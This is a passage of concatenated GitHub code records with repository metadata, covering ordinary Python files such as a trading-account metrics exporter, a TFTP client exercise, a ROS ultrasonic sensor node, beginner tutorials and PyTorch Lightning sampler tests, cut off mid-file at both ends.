alpaca_data.get(\"SECRET_KEY\", \"\")\n        BASE_URL = alpaca_data.get(\"BASE_URL\", \"\")\n\n        ORDERS_URL = \"{}/v2/orders\".format(BASE_URL)\n        ACCOUNT_URL = \"{}/v2/account\".format(BASE_URL)\n        POSITION_URL = \"{}/v2/positions\".format(BASE_URL)\n        HEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n\n        main()\n\n    except Exception as e:\n        print(e)\n        
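The exporter in this record reduces to one labelled `Gauge` updated in a loop. A self-contained sketch of that pattern using `prometheus_client` directly (the port and balance values are made up for illustration):

```python
from prometheus_client import Gauge, start_http_server

balance = Gauge('balance', 'Hold current account balances', ['balance_type'])
start_http_server(8000)  # hypothetical port; the module reads it from PORT
balance.labels('EQUITY').set(10000.0)        # made-up values
balance.labels('BUYING_POWER').set(2500.0)
# GET http://localhost:8000/metrics now exposes both series under 'balance'.
```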
sys.exit()","repo_name":"GoldUniform/alpaca-stack","sub_path":"account_exporter/account_exporter.py","file_name":"account_exporter.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}{"seq_id":"36857528663","text":"import Audio\nimport Graficos\n\nprint('\\t\\t\\tBEAT FREQUENCY AND WAVE INTERFERENCE\\n')\nprint('THIS SCRIPT OFFERS OPTIONS TO DISPLAY GRAPHS AND PLAY SOUNDS OF SINUSOIDAL SIGNALS, GIVEN TWO FREQUENCIES.')\n\nkey = 1\nwhile key == 1:\n    choice = int(input('DO YOU WANT TO SEE THE GRAPHS (1) OR HEAR THE SIGNALS (2)? 3 TO EXIT\\n'))\n    if choice == 1:\n        Graficos.iniciaGraficos()\n    elif choice == 2:\n        Audio.Inicia()\n    elif choice == 3:\n        key = 0\n\n#Audio.Inicia()\n#Graficos.iniciaGraficos()\n","repo_name":"JhusNeto/beat-frequency-generator","sub_path":"FINAL.py","file_name":"FINAL.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"38761984038","text":"import socket\nimport struct\nimport time\n\n'''\n    https://tools.ietf.org/html/rfc1350\n\n    opcode  operation\n    1     Read request (RRQ)\n    2     Write request (WRQ)\n    3     Data (DATA)\n    4     Acknowledgment (ACK)\n    5     Error (ERROR)\n\n'''\n\nUDP_IP = \"127.0.0.1\"\nUDP_PORT = 69\nFILENAME = \"sample.txt\"\n\nprint(\"UDP target IP: %s\"%UDP_IP)\nprint(\"UDP target port: %d\"%UDP_PORT)\nprint(\"message: %s\"%FILENAME)\n\nFN = bytes(FILENAME.encode('ascii'))\nMODE = bytes('netascii'.encode('ascii'))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP\n\nsock.bind((UDP_IP, 0)) # zero means: pick any free port\nRCV_PORT = sock.getsockname()[1] # get the port that was selected\n\nMSG = struct.pack(\">H%dsB%dsB\"%(len(FN),len(MODE)),1,FN,0,MODE,0)\nsock.sendto(MSG, (UDP_IP, UDP_PORT))\n\ntime.sleep(2)\n\ndata, addr = sock.recvfrom(512)\nprint(data)\nprint(len(data))\n\nOPTO,BLK_N,FILE_RCV = struct.unpack('>HH%ds'%(len(data)-4),data)\nprint('opcode: %d'%OPTO)\nprint('block number: %d'%BLK_N)\nprint('file: %s'%FILE_RCV)\n\n#MSG = struct.pack(\">HH\",3,BLK_N)\n#sock.sendto(MSG, (UDP_IP, UDP_PORT))\n\n\n","repo_name":"rogerioicestacio/redes","sub_path":"tftp_client.py","file_name":"tftp_client.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"3764403537","text":"#!/usr/bin/env python\nimport time\nimport math\n\ntry:\n    import RPi.GPIO as GPIO\nexcept ImportError:\n    from crues import GPIO_MOCK as GPIO\n\nimport rospy\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import LaserScan\n\n# Approx. speed of sound at 20C in m/s\nSPEED_OF_SOUND = 343\n\n\nclass UltrasonicTimeout(Exception):\n    \"\"\"Error for indicating that an ultrasonic sensor has timed out (e.g. 
because GPIO missed an edge).\"\"\"\n\n def __init__(self, name, timeout, is_on_rising_edge):\n if is_on_rising_edge:\n msg = \"%s ultrasonic sensor timed out after %f s\" % (name, timeout)\n else:\n msg = \"%s ultrasonic sensor missed rising edge\" % name\n super(UltrasonicTimeout, self).__init__(msg)\n self.name = name\n self.timeout = timeout\n self.is_on_rising_edge = is_on_rising_edge\n\n\nclass Ultrasonic:\n def __init__(self, name, trig_pin, echo_pin, sensor_timeout, pulse_duration=0.00001, response=1.0, offset=0.0):\n self.name = name\n self.trig_pin = trig_pin\n self.echo_pin = echo_pin\n self.sensor_timeout = sensor_timeout\n self.pulse_duration = pulse_duration\n self.start_time = -1\n self.stop_time = -1\n self.response = response\n self.offset = offset\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(trig_pin, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(echo_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(echo_pin, GPIO.BOTH, callback=self._log_time)\n\n def get_range(self):\n \"\"\"Get range from ultrasonic sensor in metres.\n\n :return: (float) Approx. range in metres\n :except: (UltrasonicTimeout) If module timed out waiting for GPIO input change\n \"\"\"\n self.start_time = -1\n self.stop_time = -1\n GPIO.output(self.trig_pin, GPIO.HIGH)\n time.sleep(self.pulse_duration)\n GPIO.output(self.trig_pin, GPIO.LOW)\n time.sleep(self.sensor_timeout)\n if self.start_time < 0 or self.stop_time < 0:\n raise UltrasonicTimeout(self.name, self.sensor_timeout, self.start_time < 0)\n duration = self.stop_time - self.start_time\n distance = duration * SPEED_OF_SOUND * 0.5\n return self.response * distance - self.offset\n\n def _log_time(self, _):\n if GPIO.input(self.echo_pin):\n self.start_time = time.time()\n else:\n self.stop_time = time.time()\n\n def cleanup(self):\n GPIO.cleanup([self.trig_pin, self.echo_pin])\n\n\nclass UltrasonicScanner:\n def __init__(self):\n rospy.init_node(\"ultrasonic\")\n self.time_increment = rospy.get_param('~scan_increment', 0.05)\n timeout = self.time_increment * 0.9\n self.angle_min = rospy.get_param('~angle_min', -math.pi / 6)\n self.angle_max = rospy.get_param('~angle_max', math.pi / 6)\n self.angle_increment = rospy.get_param('~angle_increment', math.pi / 6)\n self.offset_centre = rospy.get_param('~offset_scan_centre', 0.127)\n self.offset_outer = rospy.get_param('~offset_scan_outer', 0.121)\n self.range_min = rospy.get_param('~range_min', 0) + self.offset_outer\n self.range_max = rospy.get_param('~range_max', 1.0) + self.offset_outer\n self.scan_frame_id = rospy.get_param('~scan_frame_id', 'us_scan_frame')\n self.left = Ultrasonic(\"Left\", rospy.get_param('pins/ult'), rospy.get_param('pins/ule'), timeout,\n response=rospy.get_param('~response_left', 1.0),\n offset=rospy.get_param('~offset_left', 0.02))\n self.centre = Ultrasonic(\"Centre\", rospy.get_param('pins/uct'), rospy.get_param('pins/uce'), timeout,\n response=rospy.get_param('~response_centre', 1.0),\n offset=rospy.get_param('~offset_centre', 0.02))\n self.right = Ultrasonic(\"Right\", rospy.get_param('pins/urt'), rospy.get_param('pins/ure'), timeout,\n response=rospy.get_param('~response_right', 1.0),\n offset=rospy.get_param('~offset_right', 0.02))\n f = rospy.get_param('~rate', 5)\n self.rate = rospy.Rate(f)\n self.scan_time = 1.0 / f\n self.pulse_offset = rospy.get_param('~pulse_offset', 0)\n self.pub_l = rospy.Publisher('ul_range', Float32, queue_size=10)\n self.pub_c = rospy.Publisher('uc_range', Float32, queue_size=10)\n self.pub_r = rospy.Publisher('ur_range', Float32, 
queue_size=10)\n        self.scan_pub = rospy.Publisher('sonar_scan', LaserScan, queue_size=10)\n\n    def _duration_till_next_tick(self):\n        now = rospy.get_time()\n        next_tick = math.floor(now) + self.pulse_offset\n        while next_tick < now:\n            next_tick += self.scan_time\n        return next_tick - now\n\n    def spin(self):\n        try:\n            while not rospy.is_shutdown():\n                self._scan()\n                rospy.sleep(self._duration_till_next_tick())\n        finally:\n            self.left.cleanup()\n            self.centre.cleanup()\n            self.right.cleanup()\n\n    def _scan(self):\n        start = time.time()\n        stamp = rospy.Time.now()\n        range_r = self._publish_range(self.right, self.pub_r)\n        time_remaining = start + self.time_increment - time.time()\n        if time_remaining > 0:\n            time.sleep(time_remaining)\n        range_c = self._publish_range(self.centre, self.pub_c)\n        time_remaining = start + 2 * self.time_increment - time.time()\n        if time_remaining > 0:\n            time.sleep(time_remaining)\n        range_l = self._publish_range(self.left, self.pub_l)\n        self._publish_scan(range_r, range_c, range_l, stamp)\n\n    def _publish_scan(self, range_r, range_c, range_l, timestamp):\n        scan = LaserScan()\n        scan.header.stamp = timestamp\n        scan.header.frame_id = self.scan_frame_id\n        scan.scan_time = self.scan_time\n        scan.angle_min = self.angle_min\n        scan.angle_max = self.angle_max\n        scan.angle_increment = self.angle_increment\n        scan.range_min = self.range_min\n        scan.range_max = self.range_max\n        scan.time_increment = self.time_increment\n        scan.ranges = [range_r + self.offset_outer, range_c + self.offset_centre, range_l + self.offset_outer]\n        scan.intensities = []\n        self.scan_pub.publish(scan)\n\n    @staticmethod\n    def _publish_range(sensor, pub):\n        r = -1000\n        try:\n            r = sensor.get_range()\n        except UltrasonicTimeout as e:\n            if e.is_on_rising_edge:\n                rospy.logerr(str(e))\n            else:\n                rospy.logwarn(str(e))\n        else:\n            rospy.logdebug(\"%s ultrasonic node range: %d\", sensor.name, r)\n        finally:\n            pub.publish(r)\n        return r\n\n\nif __name__ == '__main__':\n    try:\n        scanner = UltrasonicScanner()\n        scanner.spin()\n    except rospy.ROSInterruptException:\n        pass\n","repo_name":"rddunphy/CRUES","sub_path":"crues_pi/ros_pkgs/crues_sensors/scripts/us_node.py","file_name":"us_node.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}{"seq_id":"31817571502","text":"import json\n\n# Source JSON structure\nsource_json = {\n    \"sn1.1:0.1\": \"Saṁyutta Nikāya 1.1\",\n    \"sn1.1:0.2\": \"1. 
Naḷavagga\",\n    \"sn1.1:0.3\": \"Oghataraṇasutta\",\n    \"sn1.1:1.1\": \"Evaṁ me sutaṁ—\",\n    \"sn1.1:1.2\": \"ekaṁ samayaṁ bhagavā sāvatthiyaṁ viharati jetavane anāthapiṇḍikassa ārāme.\"\n}\n\n# Transform into the desired JSON structure\nresult_json = {\n    \"textID\": \"sn1.1\",\n    \"text\": [\n        {\"lineID\": key, \"line\": value.strip()} for key, value in source_json.items()\n    ]\n}\n\n# Print the result as JSON\nprint(json.dumps(result_json, ensure_ascii=False, indent=2))\n\n","repo_name":"o28o/fdg","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}{"seq_id":"10335481668","text":"import torch\nimport tops\nimport numpy as np\nimport io\nimport webdataset as wds\nimport os\nfrom ..utils import png_decoder, get_num_workers, collate_fn\n\n\ndef kp_decoder(x):\n    # Keypoints are between [0, 1] for webdataset\n    keypoints = torch.from_numpy(np.load(io.BytesIO(x))).float().view(7, 2).clamp(0, 1)\n    keypoints = torch.cat((keypoints, torch.ones((7, 1))), dim=-1)\n    return keypoints\n\n\ndef bbox_decoder(x):\n    return torch.from_numpy(np.load(io.BytesIO(x))).float().view(4)\n\n\nclass BBoxToMask:\n\n    def __call__(self, sample):\n        imsize = sample[\"image.png\"].shape[-1]\n        bbox = sample[\"bounding_box.npy\"] * imsize\n        x0, y0, x1, y1 = np.round(bbox).astype(np.int64)\n        mask = torch.ones((1, imsize, imsize), dtype=torch.bool)\n        mask[:, y0:y1, x0:x1] = 0\n        sample[\"mask\"] = mask\n        return sample\n\n\ndef get_dataloader_fdf_wds(\n        path,\n        batch_size: int,\n        num_workers: int,\n        transform: torch.nn.Module,\n        gpu_transform: torch.nn.Module,\n        infinite: bool,\n        shuffle: bool,\n        partial_batches: bool,\n        sample_shuffle=10_000,\n        tar_shuffle=100,\n        channels_last=False,\n    ):\n    # Need to set this for split_by_node to work.\n    os.environ[\"RANK\"] = str(tops.rank())\n    os.environ[\"WORLD_SIZE\"] = str(tops.world_size())\n    if infinite:\n        pipeline = [wds.ResampledShards(str(path))]\n    else:\n        pipeline = [wds.SimpleShardList(str(path))]\n    if shuffle:\n        pipeline.append(wds.shuffle(tar_shuffle))\n    pipeline.extend([\n        wds.split_by_node,\n        wds.split_by_worker,\n    ])\n    if shuffle:\n        pipeline.append(wds.shuffle(sample_shuffle))\n\n    decoder = [\n        wds.handle_extension(\"image.png\", png_decoder),\n        wds.handle_extension(\"keypoints.npy\", kp_decoder),\n    ]\n\n    rename_keys = [\n        [\"img\", \"image.png\"],\n        [\"keypoints\", \"keypoints.npy\"],\n        [\"__key__\", \"__key__\"],\n        [\"mask\", \"mask\"]\n    ]\n\n    pipeline.extend([\n        wds.tarfile_to_samples(),\n        wds.decode(*decoder),\n    ])\n    pipeline.append(wds.map(BBoxToMask()))\n    pipeline.extend([\n        wds.batched(batch_size, collation_fn=collate_fn, partial=partial_batches),\n        wds.rename_keys(*rename_keys),\n    ])\n\n    if transform is not None:\n        pipeline.append(wds.map(transform))\n    pipeline = wds.DataPipeline(*pipeline)\n    if infinite:\n        pipeline = pipeline.repeat(nepochs=1000000)\n\n    loader = wds.WebLoader(\n        pipeline, batch_size=None, shuffle=False,\n        num_workers=get_num_workers(num_workers),\n        persistent_workers=True,\n    )\n    loader = tops.DataPrefetcher(loader, gpu_transform, channels_last=channels_last, to_float=False)\n    return loader\n","repo_name":"hukkelas/deep_privacy2","sub_path":"dp2/data/datasets/fdf128_wds.py","file_name":"fdf128_wds.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"54"}{"seq_id":"7156052440","text":"import fileinput\n\n\ndumbos = []\n\nfor 
next_line in fileinput.input():\n    dumbos.append(list(map(lambda c: int(c), list(next_line.rstrip()))))\n\n\ndef add(y: int, x: int) -> int:\n    dumbos[y][x] += 1\n    if dumbos[y][x] == 10:\n        return flash(y = y, x = x)\n    return 0\n\n\ndef flash(y: int, x: int) -> int:\n    f = 1\n    if y > 0:\n        if x > 0:\n            f += add(y = y - 1, x = x - 1)\n        f += add(y = y - 1, x = x)\n        if x < 9:\n            f += add(y = y - 1, x = x + 1)\n    if x > 0:\n        f += add(y = y, x = x - 1)\n    if x < 9:\n        f += add(y = y, x = x + 1)\n    if y < 9:\n        if x > 0:\n            f += add(y = y + 1, x = x - 1)\n        f += add(y = y + 1, x = x)\n        if x < 9:\n            f += add(y = y + 1, x = x + 1)\n    return f\n\n\nflashes = 0\n\nfor step in range(100):\n    for y in range(10):\n        for x in range(10):\n            flashes += add(y = y, x = x)\n\n    for y in range(10):\n        for x in range(10):\n            if dumbos[y][x] > 9:\n                dumbos[y][x] = 0\n\nprint(flashes)","repo_name":"generalpf/advent-of-code-2021","sub_path":"day/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"43079361471","text":"# <<<<<<<<<<<<<<<<<<<<<<<Conditionals And Loops>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#<----------------------------Control System-------------------------->\n'''\nThey allow us to control the flow of our program.\n\n'''\n\n#<--------------------------Conditional Statement------------------------>\n\n'''\nif, if-else\nnested\nelse-if ladder\nternary\nswitch\n\n#<------------------------------IF ELSE---------------------------------->\nif condition:\n    statement1\nelse:\n    statement2\n\n\n <---------elif----------->\n\n\nif condition1:\n    statement1\nelif condition2:\n    statement2\nelse:\n    statement3\n\n\n\n\n\n\n'''\n\n#<------------------------------IF ELSE---------------------------------->\n#Ques1: Take an integer input and tell if it is positive or negative\n\n'''\nnumber = int(input(\"Enter a number:\"))\nif number >= 0:\n    print(\"The number is positive\")\nelse:\n    print(\"The number is negative\")\n'''\n\n\n#Ques2: Take an integer input and tell if it is even or odd\n# we have taken the input already in Ques1\n\n'''\nif number % 2 == 1:\n    print(\"Number is odd\")\nelse:\n    print(\"Number is even\")\n'''\n\n\n#Ques3: Take the cost price and selling price of an item and determine how much profit or loss was incurred\n\n'''\ncostPrice = float(input(\"Enter the cost price:\"))\nsellingPrice = float(input(\"Enter the selling price:\"))\n\nPL = sellingPrice - costPrice\n\nif PL == 0:\n    print(\"No profit, no loss\")\nelif PL > 0:\n    print(\"Your profit is:\", PL)\nelse:\n    print(\"Your loss is:\", -PL)\n'''\n\n\n#Ques4: Input the percentage of a student and print the grade according to marks: 81-100 = Very Good, 61-80 = Good, 41-60 = Average, <=40 = Fail\n\n'''\nPercentageOfStudent = float(input(\"Enter the percentage of the student:\"))\n\nif PercentageOfStudent > 80:\n    print(\"Your grade is: Very Good\")\nelif PercentageOfStudent > 60:\n    print(\"Your grade is: Good\")\nelif PercentageOfStudent >= 41:\n    print(\"Your grade is: Average\")\nelse:\n    print(\"You failed\")\n'''\n\n#<----------------------------MULTIPLE CONDITIONS USING \"and\" and \"or\"------------------------------>\n#Ques5:\n\n\n\n# engMarks = int(input(\"Enter marks in English: \"))\n# mathMarks = int(input(\"Enter marks in Math: \"))\n\n# if engMarks > 80 and mathMarks > 80:\n#     print(\"Your grade is: A\")\n# elif engMarks > 80 or mathMarks > 80:\n#     print(\"Your grade is: B\")\n# else:\n#     print(\"Your grade is: C\")\n\n\n\n\n\n#<----------------------------NESTED 
IF-ELSE------------------------------>\n\n#Ques6: Find the greatest of three numbers using nested if-else\n\n\n\n\n# n1 = int(input(\"Enter the first Number:\"))\n# n2 = int(input(\"Enter the second Number:\"))\n# n3 = int(input(\"Enter the third Number:\"))\n\n# if n1 > n2:\n#     if n1 > n3:\n#         print(n1, \"is the greatest Number\")\n#     else:\n#         print(n3, \"is the greatest Number\")\n# else:\n#     if n2 > n3:\n#         print(n2, \"is the greatest Number\")\n#     else:\n#         print(n3, \"is the greatest Number\")\n\n\n\n\n#<----------------------------MATCH CASE (Python 3.10)------------------------------>\n#Calculator using the match statement\n\n\n# num1 = int(input(\"Enter Number1:\"))\n# num2 = int(input(\"Enter Number2:\"))\n\n# operator = input(\"Enter Operator:\")\n\n# match operator:\n#     case \"+\":\n#         print(\"Sum is:\", num1 + num2)\n#     case \"-\":\n#         print(\"Difference is:\", num1 - num2)\n#     case \"*\":\n#         print(\"Product is:\", num1 * num2)\n#     case \"/\":\n#         print(\"Division is:\", num1 / num2)\n#     case \"//\":\n#         print(\"Floor division is:\", num1 // num2)\n#     case \"%\":\n#         print(\"Remainder is:\", num1 % num2)\n#     case \"**\":\n#         print(\"num1 to the power num2 is:\", num1 ** num2)\n#     case _:\n#         print(\"Enter a valid operator\")\n\n\n\n\n#<----------------------------TERNARY OPERATOR------------------------------>\n\n#Ques 7: Write a program to check if a number is odd or even using the ternary operator\n\nnum = int(input(\"Enter a number:\"))\n\noutput = \"Even\" if num % 2 == 0 else \"Odd\"\n\n# we can also use the expression directly inside print\nprint(\"Output is\", output)\n\n\n","repo_name":"JayrajPratapSingh/PYTHON-LEARNING","sub_path":"10_Conditionals.py","file_name":"10_Conditionals.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"17062071591","text":"#Print sum of all numbers within given range\r\n\r\nnum1 = int(input(\"Enter the Starting value : \"))\r\nnum2 = int(input(\"Enter the Ending value : \"))\r\ntotal = 0\r\n\r\nif num1 > num2:\r\n    print(\"Starting number cannot be greater\")\r\n    exit()\r\nelse:\r\n    for i in range(num1, num2+1):\r\n        total = total + i\r\n    \r\nprint(\"The sum of range({0},{1}) is {2}\".format(num1,num2,total)) \r\n","repo_name":"nareshkr22/gtu_python","sub_path":"sum_all.py","file_name":"sum_all.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}{"seq_id":"29847641590","text":"import random\ndef main2():\n    #print(\"Keep it logically awesome.\")\n\n    # pick and print a random quote from the file\n    f = open(\"quotes.txt\")\n    quotes = f.readlines()\n\n    last = len(quotes) - 1\n    rnd = random.randint(0, last)\n    quote = quotes[rnd].strip()\n    print(quote)\n    f.close()\n\n    # append a new quote entered by the user\n    f = open(\"quotes.txt\", 'a')\n    inp = input(\"Please enter a new quote: \")\n    f.write(inp + '\\n')\n    f.close()\nif __name__ == \"__main__\":\n    main2()\n","repo_name":"abhishekdec1994/python-random-quote","sub_path":"get-quote.py","file_name":"get-quote.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}{"seq_id":"11307201191","text":"import torch\nfrom torch import nn\nfrom functools import reduce\nfrom pathlib import Path\n\nfrom super_resolution.configs import SuperresConfig, ElucidatedSuperresConfig\nfrom ema_pytorch import EMA\n\ndef exists(val):\n    return val is not None\n\ndef safeget(dictionary, keys, default = None):\n    return reduce(lambda d, key: d.get(key, default) if isinstance(d, dict) else default, keys.split('.'), dictionary)\n\ndef 
load_superres_from_checkpoint(\n checkpoint_path,\n load_weights = True,\n load_ema_if_available = False\n):\n model_path = Path(checkpoint_path)\n full_model_path = str(model_path.resolve())\n assert model_path.exists(), f'checkpoint not found at {full_model_path}'\n loaded = torch.load(str(model_path), map_location='cpu')\n\n superres_params = safeget(loaded, 'superres_params')\n superres_type = safeget(loaded, 'superres_type')\n\n if superres_type == 'original':\n superres_klass = SuperresConfig\n elif superres_type == 'elucidated':\n superres_klass = ElucidatedSuperresConfig\n else:\n raise ValueError(f'unknown superres type {superres_type} - you need to instantiate your superres with configurations, using classes SuperresConfig or ElucidatedSuperresConfig')\n\n assert exists(superres_params) and exists(superres_type), 'superres type and configuration not saved in this checkpoint'\n\n superres = superres_klass(**superres_params).create()\n\n if not load_weights:\n return superres\n\n has_ema = 'ema' in loaded\n should_load_ema = has_ema and load_ema_if_available\n\n superres.load_state_dict(loaded['model'])\n\n if not should_load_ema:\n print('loading non-EMA version of unets')\n return superres\n\n ema_unets = nn.ModuleList([])\n for unet in superres.unets:\n ema_unets.append(EMA(unet))\n\n ema_unets.load_state_dict(loaded['ema'])\n\n for unet, ema_unet in zip(superres.unets, ema_unets):\n unet.load_state_dict(ema_unet.ema_model.state_dict())\n\n print('loaded EMA version of unets')\n return superres\n","repo_name":"ibrahimethemhamamci/GenerateCT","sub_path":"super_resolution/super_resolution/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"54"} +{"seq_id":"73952722402","text":"import math\nimport os\nimport random\nimport random as python_random\nfrom collections import defaultdict\nfrom collections.abc import Iterable\nfrom contextlib import suppress\nfrom copy import deepcopy\nfrom typing import List, Optional\nfrom unittest import mock\nfrom unittest.mock import ANY\n\nimport numpy as np\nimport pytest\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.utils.data import BatchSampler, DistributedSampler, RandomSampler, SequentialSampler\nfrom torch.utils.data._utils.worker import get_worker_info\nfrom torch.utils.data.dataloader import DataLoader, default_collate\nfrom torch.utils.data.dataset import Dataset, IterableDataset\n\nimport tests.helpers.utils as tutils\nfrom pytorch_lightning import Callback, LightningModule, seed_everything, Trainer\nfrom pytorch_lightning.utilities.auto_restart import (\n _add_capture_metadata_collate,\n _dataloader_load_state_dict,\n _dataloader_to_state_dict,\n CaptureIterableDataset,\n CaptureMapDataset,\n FastForwardSampler,\n MergedIteratorState,\n)\nfrom pytorch_lightning.utilities.enums import AutoRestartBatchKeys\nfrom pytorch_lightning.utilities.exceptions import ExitGracefullyException, MisconfigurationException\nfrom pytorch_lightning.utilities.fetching import DataFetcher\nfrom pytorch_lightning.utilities.imports import _fault_tolerant_training\nfrom tests.helpers.boring_model import BoringModel, RandomDataset\nfrom tests.helpers.runif import RunIf\n\n\n# Credit to PyTorch Team.\n# Taken from:\n# https://github.com/pytorch/pytorch/blob/3b977a0d2834d300c0301a0c6af98c8e939019ce/torch/utils/data/_utils/worker.py#L151\n# Not available until torch 1.9.0\ndef 
_generate_state(base_seed, worker_id):\n    INIT_A = 0x43B0D7E5\n    MULT_A = 0x931E8875\n    INIT_B = 0x8B51F9DD\n    MULT_B = 0x58F38DED\n    MIX_MULT_L = 0xCA01F9DD\n    MIX_MULT_R = 0x4973F715\n    XSHIFT = 4 * 8 // 2\n    MASK32 = 0xFFFFFFFF\n\n    entropy = [worker_id, base_seed & MASK32, base_seed >> 32, 0]\n    pool = [0] * 4\n\n    hash_const_A = INIT_A\n\n    def hash(value):\n        nonlocal hash_const_A\n        value = (value ^ hash_const_A) & MASK32\n        hash_const_A = (hash_const_A * MULT_A) & MASK32\n        value = (value * hash_const_A) & MASK32\n        value = (value ^ (value >> XSHIFT)) & MASK32\n        return value\n\n    def mix(x, y):\n        result_x = (MIX_MULT_L * x) & MASK32\n        result_y = (MIX_MULT_R * y) & MASK32\n        result = (result_x - result_y) & MASK32\n        result = (result ^ (result >> XSHIFT)) & MASK32\n        return result\n\n    # Add in the entropy to the pool.\n    for i in range(len(pool)):\n        pool[i] = hash(entropy[i])\n\n    # Mix all bits together so late bits can affect earlier bits.\n    for i_src in range(len(pool)):\n        for i_dst in range(len(pool)):\n            if i_src != i_dst:\n                pool[i_dst] = mix(pool[i_dst], hash(pool[i_src]))\n\n    hash_const_B = INIT_B\n    state = []\n    for i_dst in range(4):\n        data_val = pool[i_dst]\n        data_val = (data_val ^ hash_const_B) & MASK32\n        hash_const_B = (hash_const_B * MULT_B) & MASK32\n        data_val = (data_val * hash_const_B) & MASK32\n        data_val = (data_val ^ (data_val >> XSHIFT)) & MASK32\n        state.append(data_val)\n    return state\n\n\ndef test_fast_forward_getattr():\n    dataset = range(15)\n    sampler = SequentialSampler(dataset)\n    batch_sampler = BatchSampler(sampler, 3, False)\n    index_batch_sampler = FastForwardSampler(batch_sampler)\n\n    assert index_batch_sampler.batch_size == 3\n    assert index_batch_sampler.sampler == sampler\n\n\ndef test_fast_forward_on_batch_sampler():\n    \"\"\"This test ensures ``FastForwardSampler`` applied to ``BatchSampler`` correctly retrieved the right next batch\n    on restart.\"\"\"\n    dataset = range(15)\n    sampler = SequentialSampler(dataset)\n    batch_sampler = BatchSampler(sampler, 3, False)\n    index_batch_sampler = FastForwardSampler(batch_sampler)\n\n    assert isinstance(index_batch_sampler, Iterable)\n\n    index_batch_sampler_iter = iter(index_batch_sampler)\n\n    assert next(index_batch_sampler_iter) == [0, 1, 2]\n    assert next(index_batch_sampler_iter) == [3, 4, 5]\n\n    state_dict = index_batch_sampler.state_dict(2)\n\n    index_batch_sampler = FastForwardSampler(batch_sampler)\n    index_batch_sampler.load_state_dict(state_dict)\n\n    index_batch_sampler_iter = iter(index_batch_sampler)\n    assert next(index_batch_sampler_iter) == [6, 7, 8]\n\n\ndef test_fast_forward_on_sequential_sampler():\n    \"\"\"This test ensures ``FastForwardSampler`` applied to ``SequentialSampler`` correctly retrieved the right next\n    batch on restart.\"\"\"\n    dataset = range(15)\n    sequential_sampler = SequentialSampler(dataset)\n    sampler = FastForwardSampler(sequential_sampler)\n    sampler.setup(3)\n    batch_sampler = BatchSampler(sampler, 3, False)\n\n    batch_sampler_iter = iter(batch_sampler)\n\n    assert next(batch_sampler_iter) == [0, 1, 2]\n    assert next(batch_sampler_iter) == [3, 4, 5]\n\n    state_dict = sampler.state_dict(2)\n    assert state_dict[0][\"current_iteration\"] == 6\n\n    sampler.load_state_dict(state_dict)\n\n    batch_sampler_iter = iter(batch_sampler)\n    assert next(batch_sampler_iter) == [6, 7, 8]\n\n\n@pytest.mark.skipif(torch.cuda.is_available(), reason=\"todo (tchaton) Need more investigation\")\ndef test_fast_forward_on_random_sampler():\n    \"\"\"This test ensures ``FastForwardSampler`` applied to ``RandomSampler`` correctly retrieved the 
right next\n batch on restart.\"\"\"\n seed = 42\n seed_everything(42)\n\n dataset = range(15)\n generator = torch.Generator().manual_seed(seed)\n values = list(RandomSampler(dataset, generator=generator))\n\n generator = torch.Generator().manual_seed(seed)\n random_sampler = RandomSampler(dataset, generator=generator)\n sampler = FastForwardSampler(random_sampler)\n sampler.setup(3)\n batch_sampler = BatchSampler(sampler, 3, False)\n\n batch_sampler_iter = iter(batch_sampler)\n\n assert next(batch_sampler_iter) == values[:3]\n assert next(batch_sampler_iter) == values[3:6]\n assert next(batch_sampler_iter) == values[6:9]\n\n state_dict = sampler.state_dict(3)\n assert state_dict[0][\"current_iteration\"] == 9\n state_dict[0][\"current_iteration\"] = 6\n\n seed_everything(42)\n generator = torch.Generator().manual_seed(seed)\n random_sampler = RandomSampler(dataset, generator=generator)\n sampler = FastForwardSampler(random_sampler)\n sampler.setup(3)\n batch_sampler = BatchSampler(sampler, 3, False)\n sampler.load_state_dict(state_dict)\n\n batch_sampler_iter = iter(batch_sampler)\n assert next(batch_sampler_iter) == values[6:9]\n has_raised = False\n try:\n for _ in range(5):\n next(batch_sampler_iter)\n except StopIteration:\n has_raised = True\n assert sampler._current_iteration == 0\n sampler.load_state_dict(sampler.state_dict(0))\n assert has_raised\n\n\nclass RangeIterableDataset(IterableDataset):\n def __init__(self, data, num_workers: int, batch_size: int, state_dict=None, attr_name: str = \"iter_sampler\"):\n self.data = list(data)\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.state_dict = state_dict\n self.attr_name = attr_name\n\n def __iter__(self):\n worker_info = get_worker_info()\n if worker_info and self.num_workers == 